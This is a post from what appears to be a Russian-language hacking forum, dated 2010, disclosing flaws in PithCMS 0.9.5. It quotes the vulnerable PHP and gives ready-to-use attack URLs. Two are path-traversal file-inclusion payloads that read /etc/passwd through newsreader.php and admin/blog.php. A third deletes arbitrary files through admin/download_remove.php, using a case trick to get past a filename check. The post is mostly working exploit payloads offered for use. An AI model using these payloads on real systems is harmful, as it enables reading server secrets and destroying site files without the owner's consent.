28.03.2010, 14:59
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: PithCMS
Version: 0.9.5
Author: http://sourceforge.net/projects/pithcms/
Local File Inclusion
File: newsreader.php
Need: rg=on;
PHP код:
include ("admin/lang/$lang");
include ("_read_config.inc.php");
include_once ("inc/cleaner.inc.php");
Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd
File: admin/blog.php
Need:logged on target site!
PHP код:
session_start();
if (!isset($_SESSION['user'])) {
echo "<h2>ACCESS DENIED AND LOGGED</h2>";
exit;
}
...
f (isset($_POST['filename'])) {
//include ("$rootdir/articles/".$_POST['filename']);
include ("../news/".$_POST['filename']);
}else{
...
Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd
Remove arbitrary file
File: admin/download_remove.php
Need: logged on target site!
PHP код:
if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) {
$file = trim($_POST['file']);
$object = ("../downloads/$file");
Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
|
|
|